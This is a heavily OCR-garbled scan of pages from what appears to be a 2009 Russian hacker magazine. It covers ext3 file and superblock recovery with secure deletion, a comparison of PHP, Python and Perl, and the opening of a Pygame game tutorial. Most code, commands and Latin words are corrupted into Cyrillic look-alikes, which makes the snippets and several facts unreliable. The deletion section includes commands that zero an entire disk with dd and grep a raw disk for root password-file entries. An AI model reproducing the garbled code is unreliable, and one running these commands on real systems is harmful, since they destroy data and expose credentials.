аііте: 0х4а23^530 -- Моп Зип 1 21:35:12 2009 

тгіте: 0х4а23^530 — моп Зип 1 21:35:12 2009 

скіте: 0х4а23"Р948 — Моп Зип 1 21:52:40 2009 

5іге оТ ехіга іпосіе *Рі еі сіз : 4 
Разт_1 і пк_гіезг : . . /1 і ЬаѵаИі -сі і епі З/ЫЕѴ у/5 . дг 
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ВОССТАНОВЛЕНИЕ СУПЕР-БЛОКА 

В случае повреждения супер-блока драйвер файловой сис- 
темы откажется примонтировать раздел, а команда е2іъск 
уверенно скажет, что подсовываемый раздел — это что 
угодно, только не файловая система ехТ2. Ксчастью, копии 
супер-блока в ехТ2 и ехТЗ разбросаны по всему разделу, так 
что восстановить его нетрудно. 

Файловые системы ехТ2 и ехТЗ используют своего рода 
мета-блоки (группы блоков], в начале каждого из которых 
расположена копия супер-блока. Размер мета-блока равен 
размеру блока файловой системы, умноженному на восемь. 
Так, первая копия супер-блока в ФС, размер блока которой 
равен 4 Кб, будет расположена по смещению 4096*8=32768, 
вторая — 65536 ит.д. 

Восстановить супер-блок из копии можно с помощью всетой 
же утилиты е2іъск: 




[ НТТР://ѴѴѴШ 

"■ Г 

> Ііпкз 

уууууу.хз4а[[. 
піУ-сагЫ 7/Ь оѵѵіо/ 
ипбеіеіе ехіЗ.ЫтІ — 
объемный документ, 
описывающий про- 
цесс восстановления 
файлов в файловой 
системе ехіЗ. 



# е2:Езск -Ь 32768 /сіеѵ/зсіаі 



Первая копия может оказаться поврежденной. Придется об- 
ратиться к следующей, затем еще к одной — до тех пор, пока 
не будет найдена целая и невредимая копия супер-блока. 

ПО ДРУГУЮ СТОРОНУ ФРОНТА 

Мы рассмотрели способы восстановления удаленных 
файлов, но ни слова несказали отом, какобезопаситьсебя 
оттех, кто используетописанные методики в корыстных или 
изобличительных целях. Ведь хороший специалист, страст- 
но желающий за владеть твои ми данными или паролями, не 
остановится ни переднем; ему не будут помехой ни специфи- 
ка работы ехТЗ, ни разрушениетаблицы іпосіе. 

Ты, наверное, уже понял, что если содержимое файла никуда 
не исчезает после удаления, то для полного уничтожения 
информации достаточно записать поверх него какой-нибудь 
мусор. Это действительно так, за одним лишь исключением: 
после этой операции обязательно следует вызвать команду 
зупс для сброса кэша ФС на диск, иначеты рискуешь быть 
застигнутым врасплохтеми, кто любит отключать электро- 
энергию перед непосредственным выбиванием входной 
двери: 

$ сИ іТ=/Тюше/уи1уа/Последний_хит_Киркорова . 
трЗ оН=/коте/ѵазуа/Важный_файл 
$ зупс 

$ гт /йоте/ѵазуа/Важный_файл 
$ зупс 

В качестве источника мусора можно использовать/сіеѵ/ 
гего или/беѵ/гапсіопп, кому как больше нравится. Особенно 
это актуально для зачистки всего диска (перед продажей, 
например]: 



# дгер -а -В1 -А2 00 ' гоок:х:0' /сіеѵ/зсіаі 



$ сісі і1=/сіеѵ/2его о 1= /сіеѵ/зсіаі □С 
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АЛЕКСАНДР КРАСНОЩЕКОВ 
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ТРИ ПОЛНЫХ пэ 



РуНіоп, РНР или Регі? 

^ — 1 Выбираем последнюю букву в слове «І.АМР» 

+ + + + 

В рамках этой статьи мы будем выбирать лампочку. Для тех, кто еще не 
++++ в курсе, поясню: І_АМР=І_іпих+АрасІіе+Му8СН_+РНР/Ру1:Ііоп/РегІ — са- 
— і мая популярная, одобренная ГорСветом из «Дневного Дозора», элек- 
++++ тротехническая связка для освещения всемирной Сети. С первыми 

тремя буквами акронима все ясно (на самом деле, это только кажется), 
++++ а вотс выбором четвертой мы сейчас и попытаемся разобраться. 



н і 

+ + + + 



+ + + + 



+ + + + 



РНР А.К.А. ПРОСТОЙ 

РНР (также известный, как Регзопаі Ноте Раде 
и РНР: Нуреііехі Ргергосеззог] — это скрип- 
тинговый язык, который отлично подходит для 
ѵѵеЬ-разработки. РНР — не что иное, какобо- 
лочка вокруг языка С, с управлением памятью 
(подсчет ссылок) и гибкой системойтипов. 
Обычно РНР выполняется на ѵѵеЬ-сервере, 
обрабатывая код на входе и генерируя ѵѵеЬ- 
страницы на выходе. Также, как и во многих 
других интерпретируемых языках програм- 



мирования, РНР-скрипты обычно хранятся в 
исходниках даже на производственныхѵѵеЬ- 
серверах. Это увеличивает время их выполне- 
нияза счет компиляции налету. 

РНР выполняет код, заключенный в тэг <?рбр 
... ?> и его подвиды, а остальное содержимое 
файла выводится прямо на страницу. Пере- 
менные предваряются знаком $ и нетребуют 
указаниятипа. Ключевые слова и синтаксис 
языка похожи на большинство высокоуровне- 
вых языков программирования, следующих 
синтаксису языка С. 



В этом весь он: характерный пример скрипта 
на «пыхе». Выводит: ѵаг 

<?рЪр 

$а = 1 ѵаг ' I 

$Ъ = 1 іаЫе ' ; 

$ѵагіаЫе = 'ѵаг' ; 
есТю $ { $а . $Ь} ; 

?> 

Огромное количество сайтов (около 20 млн.) 
в Сети написано на РНР, включая таких 
гигантов, как ѴѴікіресІіа, УаНіоо!, РасеЬоок, 
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Бідд, ѴѴогсІРгеББ, ѴоиТиЬе. Популярность РНР 
основана натом, что его легко использовать, 
и вставки легко читаемы в НТМІ_-документах. 
Использование РНР в паре с твоим любимым 
НТМІ_-редактором — это отличный путь ксоз- 
данию динамического контента при минимуме 
затратна программирование. 

Легкость разработки, основанная на фило- 
софии РНР («Структура не важна»), имеет и об- 
ратную сторону. Быстро научившись писать на 
«простом» РНР, ты забываешьо соблюдении 
грамотной структуры приложения, правилах 
хорошего тона, и когда твое приложение пере- 
ходит границы «небольшого», ты начинаешь 
вязнуть в собственноручно написанном коде. 

В качестве аргумента «против» можно приве- 
сти и статистикууязвимостей РНР из Ыабопаі 
ѴиІпегаЬіІКу ОаІаЬазе: 35.87%(!) уязвимостей 
всего программного обеспечения беретна себя 
РНР. 

ТРЮКИ НА РНР 

Проверка длины строки работает бы- 
стрее, если проверить наличие 
символа: 

;іі ( ! іззеі ($іоо{5) ) ) { есію " Роо із 
іоо зЬогі " ; } 

...а не считать длину всей строки: 

і і (зігіеп ( $іоо) < 5) { есію "Роо із 
ІОО зіюгі " ; } 

Поиск в массиве по ключу: 

$кеуз = аггау ( " арріез " =>1 , 

" огапдез " =>1 , . . . ) ; 

іі (іззеі ($кеуз [ 'тапдоез 1 ]) ) (...) 

Работает в три раза быстрее, чем по 
данным : 

$кеуз = аггау (" арріез " , "огапдез", 

іі ( іп_аггау ( 'шапдоез 1 , $кеуз) ) { 

... }?> 

Несмотря на недостатки РНР и орды недоволь- 
ных им разработчиков, значительно боль- 
шему проценту кодеров он нравится. Можно 
сказать объективно: сегодня РНР — «рабочая 
лошадка» интернета. Его аргументы внуши- 
тельны: просто выучить, просто писать, просто 
размещать. 

РѴТНОМА.К.А. КРАСИВЫЙ 

Питон — преимущественно ночноеживотное. 
День проводит в укрытии (норы, дупла, груды 
опавших листьев), а ночью или в сумерках 
выходит на охоту. Хорошо плавает. Вырастает 
до 1 ,5 метров. Крометого, Руібоп — это один 
из языков высокого уровня, общего назначе- 
ния. Базовый синтаксис и семантика Руібоп’а 
минималистичны, а стандартные библиотеки, 
напротив, огромны и сложны. Руібоп поддер- 
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живает несколько парадигм программирова- 
ния (ООП, императивное и функциональное) 
и обладает та ким и фичами, как полностью 
динамическая система типов и автоматическое 
управление памятью. 

Руібоп разрабатывался каклегко читаемый 
язык. Его ключевая идея: «Должен бытьтолько 
один, и лучше всего очевидный, способ сделать 
это». Отсюда следует, что код, написанный од- 
ним разработчиком, можетлегко развиваться 
и поддерживаться другим. Крометого, Руібоп 
«навязывает» программистам дисциплину 
(использованием отступов и синтаксисом кода). 
Это позволяетлегко поддерживать крупные 
приложения. Я говорю «отступы и синтаксис», 
потому что в Руібоп’е для отделения блоков 
кода используются отступы, а не фигурные 
скобки (как в С, С++,...) или ключевые слова (как 
в Бе1рЫ) — в общем-то, исключение из правил. 
Увеличение отступа идет после определенных 
операторов [\і, бе), іог, (гу ...), а уменьшение 
указывает на конецтекущего блока. 

Быстрая сортировка на РуІЬоп. Одно слово — 
элегантный 

сіеі дзогі (Ь) : 

ІН Ь == [] : 
геіигп [ ] 
ріѵоі = Ь [0] 

геіигп (дзогі ( [х іог х іп Ь[ 1 : ] \ 
іі х < ріѵоі] ) + [ріѵоі] + \ 
дзогі ( [х іог х іп Ь [ 1 : ] \ 
іі х >= ріѵоі] ) ) 

Руібоп успешно внедряется в программные 
продукты какскриптинговый язык, исполь- 
зуется в ЗБ-анимации (Мауа, 5оШтадеХ51, 
Віепбег] и редакторах изображений (6ІМР, 
Іпкзсаре, ЭсгіЬиз, Раіпі ЭЬор Рго). На нем даже 
написана пара видеоигр. 

ТРЮКИ НА ПИТОНЕ 

Декоратор позволяет завернуть одну 
функцию в другую: 

сіеі сіесогаіогі ( іипс) : 

геіигп ІатЪсіа: іипс ( ) + 2 
сіеі с!есогаіог2 (іипс) : 
сіеі ргіпі_іипс ( ) : 
ргіпі іипс ( ) 
геіигп ргіпі_іипс 

Говорим, что нужно использовать де- 
кораторы: 

@с!есогаіог2 
©сіесогаіогі 
сіеі іипсііоп ( ) : 
геіигп 62 

И... вуаля, вызов іипсііопО магиче- 
ски напечатает 64 

Несмотря на тот факт, что Руібоп использу- 
ют Ооодіе, Ѵабоо!, СЕРЫ и ЫА5А, у него есть 
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серьезная проблема с популярностью, аточнее 
— распространенностью. Люди, которые им 
пользуются, влюблены в него, но большинство 
рядовых разработчиков даже не слышали о 
Питоне (хотя сейчас ситуация улучшается). 
Когда приходишь в книжный магазин и видишь 
20 книжек про РНР/МуЗОБ и две про РуОпоп, 
создается впечатление, что широкие програм- 
мерские массы идут не в том направлении. 
Причина все та же — РНР проще и, несмотря 
на все недостатки, ты сходу сможешь написать 
ѵѵеЬ-страничку на РНР, вто время как Руібоп 
потребует, как минимум, подключения библио- 
тек и умения работать с ними. 

Люди, перешедшие с РНР на Руібоп, сразу 
начинают кричать, что РНР не имеет шансов 
против Руібоп’а и что они ни за что не вер- 
нутся обратно. Конечно, можно не обращать 
внимания, но эти крики основаны на фактах: 
выучив РуЛпоп, ты начинаешь получать от 
него удовольствие. Однако необходимо 
уточнить: мало его просто выучить, нужно 
разобраться с использованием платформ 
для создания ѵѵеЬ-приложений. В связи 
с этим программеры часто задают себе 
вопрос: «А зачем мне тратить свое время 
(время — деньги) на изучение РуЛіоп’а, если 
за неделю с нуля можно начать писать на 
РНР?». Ответ прост: потому что разработка 
приложений на РуЛпоп’е идет быстрее на 
30%, а его уязвимости составляют всего 
0.67% от общего числа, против 36% у РНР 
(РуЛіоп неуязвим :]]. 

РЕРЬА.К.А СИЛЬНЫЙ 

Регі относится кязыкам программирования 
общего назначения. Разработан он для рутин- 
ной обработки текстов и составления отчетов 
и сейчас используется для решения широкого 
круга задач, включая системное администри- 
рование, ѵѵеб-разработку, сетевое программи- 
рование, игры и создание 6111. 

Регі, скорее, призван быть практичным (легким 
в использовании, эффективным и полным), чем 
красивым. Он поддерживает несколько пара- 
дигм программирования (впрочем, каки РуіНоп 
с РНР), управление памятью (подсчет ссылок), 
встроенную обработку текста и кучу сторонних 
модулей. 

Простые числа на Регі. 

Сильно, но непонятно 

регі -ѵтіе ' (1 х $_) !~ / /ч (11 + )\1+$/ 

&& ргіпі ткЬіІе ++ 

Регі чем-то похож на волшебную палочку. 
Гуру Регі’ а часто считают себя волшебни- 
ками с толстыми волшебными жезлами в 
руках. Регі обладает богатым синтаксисом 
и следует философии «Должно быть много 
способов сделать это». Однако встретить се- 
рьезного программиста на Регі в наше время 
уже нетаклегко. Регі нужно учить дольше, 
чем Руібоп, не говоря уже о РНР, и за ним за- 
крепилась прочная репутация языка «только 
на запись». 




согііпд 
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МНЕНИЕ ЭКСПЕРТОВ 



РОМАН «5РІВІТ» ХОМЕНКО, 

ЛЕЙТЕНАНТМИЛИЦИИ, 

ПОСТОЯННЫЙ АВТОР РАЗДЕЛА « КОДИ Н Г» 



I МИХАИЛ ФЛЕНОВ, 

ПРОФЕССИОНАЛЬНЫЙ ПРОГРАММИСТ. 
АВТОР МНОЖЕСТВА БЕСТСЕЛЛЕРОВ. ОСНО- 
ВАЛ КОМПАНИИ НЕАРАР50РТѴѴАРЕ И СУО 
БОРТѴѴАРЕ ЬАВБ 




Роман, оправдано ли всеобщее восхищение 
РуШоп'ом? Действительно ли разработка на нем идет 
в разы быстрее? 



Михаил, каким вы видите будущее РНР? РНР ста- 
новится лучше или медленно вытесняется конку- 
рентами? 



Теоретически я тут во всю должен расхваливать РуіЬоп, говорить 
какой он суперовый, и я бы мог, ведь это чистейшая правда. Но... если 
ты новичокв веб-программинге, то учи РНР — не ошибешься. Ведь 
РуіЬоп представляет собой языкобще го назначения, а РНР — полно- 
стью веб-ориентирован, все в нем заточено под веб-кодинг. 

Когда же выучишь РНР достаточно хорошо, поймешь ООП, МѴС и дру- 
гие сложные слова, а потом еще и начнешь использовать фреймвор- 
ки... Воттогда попробуй связку РуіЬоп + Б]апдо (или какой-то другой 
фреймворк] и, скорее всего, ты полюбишь Питон за красоту про- 
грамм, за библиотеки, за скорость как разработки, так и его работы 
— за то, что он просто есть :). 

Руібоп — мощнейший язык, красоту которого не поймешь при на- 
писании простенькой домашней страницы. Л ишь при разработке 
больших проектов можно почувствовать его силу. Хотя может быть, ты 
считаешь, что уже готов к нему? Тогда приготовься к следующему: 

• мало хости нго в, что поддерживают РуіЛоп; 

• заказчики больше ориентируются на РНР; 

• собрать команду хороших питоновских программеров сложновато; 

• лучшие веб-движки (гостевых, форумов и прочего] созданы на РНР. 
Но это мелочи. За РуіЛоп’ом будущее. Он сейчас маленький ребенок, 
который только научился ходить, но скоро вырастет. И может, именно 
тебе суждено написать лучший питоновский блог-движок, форум- 
движок, да и просто лучший сайт. 



ІМНО, язык РНР будет жить еще долго и счастливо. Одна из 
причин тому — тот факт, что в свое время язык получил большую 
популярность и на нем написали множество крупных и мелких 
проектов. У меня 10 сайтов (не считая двуязычных вариантов], 
и изних8написано на РНРидва на А5Р.ЫЕТ. Буду ли я пере- 
писывать 8 сайтов на более мощном языке программирования 
только потому, что он мощнее? Конечноже, НЕТ. И точнотак 
же поступят большинство челове ко разумных в тех компаниях, 
которые используют РНР. 

Для того чтобы Ѵабоо переписала все свои программы, нужны 
сотни миллионов долларов. Даже если какая-то платформа ра- 
ботает на 50% эффективнее и можно будет сэкономить ресурсы 
датацентров, намного дешевле будет расширить мощности да- 
тацентров, чем переписывать код. Возможно, новые разработки 
будут писаться на новой платформе, но существующий код 
большинство переписывать не станет. Поэтому РНР еще долго 
будетжить счастливо, вне зависимости от действий конкурен- 
тов — уж слишком он популярен. 

Чтобы меня что-то заставило перейти на другую платформу 
или язык, я должен увидеть реальное преимущество для себя и 
посетителей моих сайтов. Единственное, чего может не хватать 
крупным разработчикам в РНР — хорошей поддержки многоя- 
дерности и многопроцессорности. Это может стать серьезной 
проблемой в среде ѴѴеЬ 3.0 или даже ѴѴеЬ 4.0, где свою эф- 
фективность смогут показать платформы .ЫЕТ и Заѵа, которые 
лучше готовы к будущему на уровне платформы. Но рынок таких 
задач настолько мал, что большинство не обращает внимания 
на это «узкое место». 

РНР не идеален, но он прост, удобен и достаточно эффективен 
для построения малых и средних сайтов. Некоторые компании 
умудряются строить на нем целые порталы, хотя это не главная 
стихия РНР. На рынке крупных систем (уровня предприятия] 
позиции РНР слабые и таковыми останутся, но для домашних 
страничек, СМ5, форумов и даже сайтов компаний платформа 
БАМР с РНР в хвосте будетжить. 
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ТРЮКИ НА ПЕРЛЕ 

1. Избавляемся от половины массива: 



» согііпд 



ДМИТРИЙ «РОКВ» 
ДОКУЧАЕВ 



РЕДАКТОР РУБРИКИ «ВЗЛОМ» 

Дмитрий, насколько силен Регі? 



Просто ли его выучить? 



На мой взгляд, Регі — один из простых языков. С 
его кроссплатформенностью и открытой модульной 
архитектурой можно творить многие интересные 
вещи. Но в настоящее время, бесспорно, ѵѵеЬ- 
программирование проще иле гче реализовать на 
РНР, а вот консольный кодинг с последующим сози- 
данием великолепных административных скриптов 
лучше поручить Регі’у. 

Что касается трудности языка, то Регі прост и 
сложен одновременно. Не стоит пытаться выучить 
его целиком. Достаточно понять азы, просмотреть 
основные модули и хоть немного научиться состав- 
лять регулярные выражения. 

Я начал изучать Регі еще в далеком 1 999 году, и этот 
язык не раз выручал меня при решении довольно 
сложных задач. 

Короче говоря, хочешь быть крутым бородатым 
сисадмином —учи Регі. 




$#аггау /= 



2 ; 



2. Добавляем что-нибудь в сводный индекс мас- 
сива : 



$аггау [©аггау] = ’ШіаС Со асІсН ; 

3. Превращаем "ТЪізТехСМіСЪоиСЗрасев" в "ТЬіз 
ТехС ѴЛСЪоиС Зрасез" : 

$СехС =~ з/ ( [а- 2 ] ) ( [А-2] ) /$1 $2/д; 

Выбор падаетна Регі в случаях, когда речь идетоб об- 
работке больших объемов данных. Кстати, создание на нем 
масштабных приложенийтребуетхорошей координации 
между разработчиками, заставляя их вспоминать отаких 
вещах, каксогласование стиля кода, наставничество и 
работа в команде. 

Говоря о ѵѵеЬ-разработке, необходимо упомянуть о 
системе шаблонов Регі’а. Когда создают динамические 
ѵѵеЬ-страницы, обычно хотят использовать что-то, что 
позволило бы сделать работу быстро и грязно. Конечно, 
это неправильно, но зато убирает барьеры. Осваивая 
Регі, тебе придется учить язык, систему шаблонов и ин- 
терфейс СУБД, и все отдельно. Если тебе не симпатизи- 
рует слово «учить» или «учить долго», подумай о РН Р. 
Ведя речьо крупныхѵѵеЬ-приложениях на Регі, мы под- 
разумеваем ЬЬс.со.ик, Атагоп.сот, Ыѵе^игпаі. По 
уязвимостям Регі занимает второе место (из трех] с 9.54% 

— в принципе, нетакуж плохо, учитывая его сложность и 
многолетнюю историю. 

выводы 

Уже все? А где жебэнчмарки?Я не привод ил тестов 
на производительность для каждого языка, потому 
что в конечном итоге язык разработки редко является 
«узким местом» системы, а с ростом производитель- 
ности компьютеров более ценным становится время, 
затрачиваемое разработчиком на разработку/под- 
держку системы. Для особо интересующихся скажу, 
что все три языка работают примерно с одинаковой 
скоростью и окончательный выбор по критерию 
«скорость» будет зависеть от конкретной задачи (под- 
робнее на ЫірѴ/зЬооІоиІ.аІіоІІі.сІеЫап.огд/дрД ]. Но 
если тебе все-таки вздумалось заняться разработкой 
крупных корпоративных приложений, критичных к 
скорости выполнения, тебе (на всякий случай] стоит 
также обратить внимание на такие технологии, как 
. N ЕТ и ^Е. 

Возвращаясь кнашейтроице, отмечу огромное потребле- 
ние памяти РНР-скриптами и прекомпиляцию скриптов 
Руібоп’а, а в заключение скажу, что все три Р: 

• кроссплатформенные; 

• имеют открытый код; 

• хорошо документированы; 

• имеютогромные сообщества пользователей; 

• имеютогромное количество написанного кода и библио- 
тек; 

• имеют развитые фреймворки (РНР — Бутію пу, рбр. 

МѴС; Руібоп^апдо, СЬеггуРу, Руіопз; Регі -СаіаІузЕ 
С6І::АррІісаІіоп, бапігу); 

Отсюда следует, что выбор любого из Р — это уже хороший 
выбор. "!" 




> іпіо 

Прежде чем 
бросаться в бой, 
выбрав приглянув- 
шуюся «Р», стоит 
обратить внимание 
на то, что не все 
хорошие языки ѵѵеб- 
программирования 
начинаются с нее. 




НТТР://ѴѴѴѴѴѴ 

I г 

> Ііпкз 

• ѵмѵѵѵ.регі.ога 

• ѵѵѵѵѵѵ.руіііоп.ога 




> сіѵсі 



На диске лежат по- 
следние версии са- 
мых известных плат- 
форм для разработки 
ѵѵеЬ-приложений: 
Зутіопу 1 .2.7 (РНР), 
Б]апдо 1 .0.2 (Руібоп) 
и Саіаіузі: 5.80003 
(Регі]. 
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РОМАН «ЗРІНІТ» ХОМЕНКО 
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ЮѴЕР! 
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С'ОИЕИЕ ВМРГЕРІМС 



I 



І.С-ЕАѴ 



дгарМсг 



- АІ 



і гладе Баск ВиНег 



I 



2.ВІН 

(сору) 



а 



ітада Баск ВиМег 




ВЕСЕЛАЯ 

” СТОРОНА РѴТНОЫ’А 



Юзаем библиотеку Рубате на примере игры «Лестница» 



++++ Игры — одно из лучших изобретений человечества. В них все мечты 
сбываются, в них мы рыцари, короли, боги! За десятки летсущество- 
++++ ван ия игростроя сценаристы придумали для нас множество миров, 
но поройтакхочется создать что-то свое — тотмир, где будутцарить 
++++ толькотвои правила. В рамках этой статьи я постараюсь научитьтебя 
— і — | использовать волшебную палочку для создания игр — Рубате. 



+ + + + 



+ + + + 



+ + + + 



+ + + + 



+ + + + 



Год назад я познакомился с Рубате и влюбил- 
ся в него с первых строк документации. Сразу 
же я вспомнил все свои мучения, связанные 
с программированием на С++ в связке с 
ОігесТХ, вспомнил, как все жутко тормозило, и 
я мучился над оптимизацией... а оно все равно 
тормозило. Вспомнил, какдля элементарных 
вещей нужно было писать десятки строк кода. 
Рубате берет все заботы на себя. Нам остает- 
ся лишь написать саму игру, а не думать, к при- 
меру, как правильно загрузить картинку. Если 
ты не собираешься писать игры, то можешь 
за юзать Рубате для создания оригинальных 
интерфейсов в своих прогах или визуализа- 
ции какой-либо информации. 

КОЛОБОК НА ЛЕСТНИЦЕ 

Рубате — это кроссплатформенный 



набор модулей, построенный поверх 
бОб-библиотеки и предназначенный для 
написания видеоигр. Он включает в себя 
библиотеки для работы с графикой и звуком, 
реализованные с использованием языка 
РуіЬоп. Автор этого чуда — Реіе бЫппегз. 
Чтобы все сказанное о Рубате не было 
лишьтеорией, разберем написание про- 
стой игры «Лестница». Выбор был сделан 
редактором рубрики. Он прямо сказал, что 
илиянапишуоб этой игре, или он не отдаст 
мне ящик минералки, который проспорил на 
последней «научной конференции» в баре. 
Однако, наша «Лестница» уже не будеттек- 
стовой игрушкой. У нас появится хакерский 
Колобок, который должен будет пройти снизу 
вверх по лестницам к двери. А сверху вниз 
будут падать камни, так и норовящие подвер- 



гнуть нашего Колобка кровавому прессингу. 
Сперва я хотел рассказать тебе о каждой 
строчке в этой игре, но, к сожалению, игруха 
получилась аж на 300 строк, поэтому я пове- 
даю только основные моменты. Они позволят 
тебе понять принципы работы с Рубате, а 
полный код игры ждеттебя на диске. 

ПОГРУЖЕНИЕ, 

ИЛИ БАЗОВЫЕ ЗНАНИЯ 

Установка Рубате в ѴѴіпсІоѵѵз проходит 
в несколько кликов с инсталяхи, которую 
можно взять с ЬЛрУ/ѵѵѵѵѵѵ.рѵдате.огд или с 
нашего диска. Для Ыпих Рубате находится 
в репозитариях. Я же, как л а мер, пишу под 
виндой и юзаю версию РуЛэоп 2.5 и соответ- 
ствующую ей версию библиотеки (поскольку 
так советует поступать сам автор библиотеки 



++++ ► 090 



ХАКЕР 07 / 127 / 09 






ЛОГОТИП РѴбАМЕ 



из соображений скорости]. Но хватит лири- 
ки, давай скорее перейдем к кодингу. Как 
всегда в РуЛзоп’е, использование РуОате 
начинается с подключения библиотек: 

ітрогк рудате 

кгот рудате . іосаіз ітрогк * 

Замечу, что рудате. Іосаіз мы полностью 
включили в область глобальной видимости, 
потому что это рекомендуют на официальном 
сайте. Именнотам собраны основные кон- 
станты, к которым мы будем часто обращать- 
ся, например, константы клавиш клавиатуры. 
Теперь проинициализируем РуОате и соз- 
дадим окно размером 640x480 и с заголовком 
«] [акер»: 

рудате . іпік ( ) 

рудате . сіізріау . зек_тосіе ( ( 640 , 4 80 ) ) 

рудате . сіізріау . зек_саркіоп ( 

' ] [акер ' ) 

Посредством этого небольшого куска кода 
мы создали не только окно, но и главную по- 
верхность (зи гіасе] для рисования, которую 
влюбой точке программы можно получить 
командой рудате. сі ізріау. деі_5и гіасе(] . Для 
самого же рисования реализовано множе- 
ство функций. Они описаны в документации 
на официальном сайте. В качестве примера 
разберем рисование линии: 

рудате . сігам. Ііпе Ыіпсіом, (10,100, 
100) , (10,200) , (20,300) ,2) 

Здесь ѵѵіпбоѵѵ — поверхность, на которой 
рисуется линия; затем идет цвет линии в 
формате (В, О, В), начальные и конечныеточ- 
ки линии в формате (Х,Ѵ], и, наконец, ширина 
линии. Кстати, эта линия будет не сглажена! 
Чтобы нарисовать сглаженную линию, нужно 
Ііпе изменить на ааііпе. Но это все не очень 
важно, ведь красивую графику таким обра- 
зом не нарисуешь. Нам придется подгружать 
картинки с файлов и их отображать, но об 
этом позже. 

Если мы попробуем сейчас нарисовать 
линию на главной поверхности, то все равно 
ничего не увидим — РуОате автоматически 
использует двойную буферизацию, и для 
того, чтобы все это хозяйство перебросить 
с главной поверхности на поверхность, 
которая проецируется на видеокарту, нужно 
вызвать рудате. сІізрІау.іІірИ. 

ітрогк рудате 

кгот рудате . Іосаіз ітрогк * 

рудате . іпік ( ) 



согііпд 




ОФИЦИАЛЬНЫЙ САЙТ РѴСАМЕ 



міпсісж = рудате . сіізріау . \ 
зек_тосіе ( ( 640 , 480)) 
рудате . сіізріау . зек_саркіоп ( 

' ] [ акер ' ) 

рудате . сігам. ааііпе (міпскж, 

(10, 100, 100), (10, 200), (20, 300), 2) 
рудате . сіізріау . кіір ( ) 
ѵ\4іі1е 1 : 
разз 

У этого тестового примера есть небольшой 
минус: он не обрабатывает события, а ведь 
нам нужно хотя бы научить его закрываться 
при нажатии на «крестик». Для получения 
событий существует функция рудате. еѵепк 
деШ, которая возвращает список всех собы- 
тий, которые возникли с момента последнего 
вызова этой функции. Изменим последний 
бесконечный цикл на воттакой: 

ѵ\4іі1е 1 : 

ког еѵепк іп рудате . еѵепк . дек ( ) : 
ік еѵепк . куре == ОІЛТ: 
зуз . ехік ( ) 

Теперь приложение нормально отобража- 
ется, не кажется зависшим и даже закрыва- 
ется :], потому что мы принимаем события 
и корректно их обрабатываем. Среди типов 
событий есть и события, связанные с кла- 
вишами — например, КЕУООѴѴЫ и КЕѴЮР. И 
если мы захотим, чтобы наше приложение 
закрывалось еще и при нажатии клавишу 
Ебс,то можно добавить условие: 

ік еѵепк . куре == КЕУБОШГ: 
ік еѵепк . кеу == К_ЕЗСАРЕ: 
зуз . ехік ( ) 



архитектуры, ведь при неправильно выбран- 
ной архитектуре разработка превращается в 
ад, и последующие изменения в каждой строч- 
ке кода можно приравнять к принудитель- 
ному прослушиванию песни Димы Билана. 
Архитектура «Лестницы» полностью основана 
на объектах. Основной объект — депегаі— по- 
рожден классом Сепегаі. Он проводит перво- 
начальную инициализацию и впоследствии 
обрабатывает глобальные события: 

сіазз Сепегаі ( ) : 
іеѵеі = 0 

сіек іпік (зеік) : 

рудате . іпік ( ) 

рудате . сіізріау . зек_тосіе ( 

(640, 480) ) 

рудате . сіізріау . зек_саркіоп ( 

' ] [акер ' ) 

сіек еѵепк ( зеік , еѵепк ) : 
ік еѵепк . куре == <21ЛТ: 
зуз . ехік ( ) 

ік еѵепк . куре == КЕУЮР: 
ік еѵепк. кеу == К_ЕЗСАРЕ: 

зеік . іосакіоп = ехік_1осакіоп 

Как видно из вышеуказанного кода, в кон- 
структоре он создает окно и обрабатывает 
события, ведущие к переходу к локации 
ехіМосаБоп. 

Локации — это объекты, наследованные от 
класса Босабоп: 

сіазз Ьосакіоп (окдеск) : 

сіек іпік (зеік) : 

зеік . ѵ/іпсісж- = рудате . сіізріау . \ 
дек_зигкасе ( ) 
сіек еѵепк ( зеік , еѵепк ) : 
разз 

сіек сігаѵЩзеІк) : 
разз 

Локации имеют конструктор, функцию по 
обработке событий и функцию по прорисовке 
экрана. Все выглядит достаточно запутано, 
но давай посмотрим на программу целиком 
(без самих объектов): 

депегаі = Сепегаі ( ) 
зкагк_1осакіоп = Зкагк_1осакіоп ( ) 
дате_1осакіоп = Сате_1осакіоп ( ) 
ехік_1осакіоп = Ехік_1осакіоп ( ) 



Тут мы видим, что нажатая клавиша со- 
храняется в еѵепккеу, а мы сравниваем ее с 
константой клавиши Езс и должным образом 
реагируем. Все эти константы перечислены 
в документации, правда, мне почему-то не 
удалось найти константу на Епіег, поэтому в 
этой ситуации я сравнивал кеу счислом 13 — 
кодом Епіег’а. 

НАЧАЛО ГЕЙМ-КОДИНГА, 
ИЛИ АРХИТЕКТУРА 

Овладев этими базовыми знаниями, мы готовы 
к гейм-кодингу. Начнем с самого трудного — 



депегаі . Іосакіоп = зкагк_1осакіоп 

сіоск = рудате . к іте . Сіоск ( ) 
ѵЩііІе 1 : 

ког еѵепк іп рудате . еѵепк . дек ( ) : 
депегаі . Іосакіоп . еѵепк ( еѵепк ) 
депегаі . еѵепк ( еѵепк ) 
депегаі . Іосакіоп . сігам ( ) 
рудате . сіізріау . кіір ( ) 
сіоск . кіск (30) 

Как можно заметить, сначала создается 
депегаБобъект. Далее создаются три лока- 
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ИСТОРИЯ РУ6АМЕ. 

РАССКАЗ СОЗДАТЕЛЯ 

Идея проекта РуСате родилась летом 2000 года. Будучи 
С-программистом с большим стажем, я почти одновременно обна- 
ружил для себя Ругіюп и 5ЭБ. Библиотека 5ЭБ (Зітріе Эігесгтесііа 
БіЪгагу) была создана 5ат Бапйп^а как кросплатформенная 
С-библиотека для контроля мультимедиа. Она использовалась в 
сотнях коммерческих и бесплатных игр. Я был под впечатлением 
от нее и понял, что, если совместить РутЬоп и 5ЭБ, получится 
очень интересная вещь. Работу над РуСате я начал в октябре 2000 
года, и через 6 месяцев была выпущена версия 1.0. 



ци и : зіа г!_Іоса1іоп — показывает юзеру приглашение начать игру, 
дате_1оса0оп — непосредственно игра, ехіМосабоп — показывает 
набранный уровень. Дальше в переменную депегаБІосайоп сохраня- 
ется стартовая локация, то есть она как бы становится активной. Затем 
в бесконечном цикле мы получаем список событий и передаем их как 
текущей локации, так и на глобальную обработку. Затем вызывается 
метод б гаѵѵ активной локации и прорисовывает экран. Удачно выбран- 
ная архитектура дает возможность разделить код, относящий к разным 
локациям. Но я пропустил объяснение строчки сІоск.йск(ЗО). Это очень 
важная часть, которая не дает 4-ядерному СогеЭио проиграть игру 
еще до того, как пользователь что-то успеетувидеть :). Строчка делает 
РР5 статическим и равным 30. Иначе говоря, она оценивает разницу 
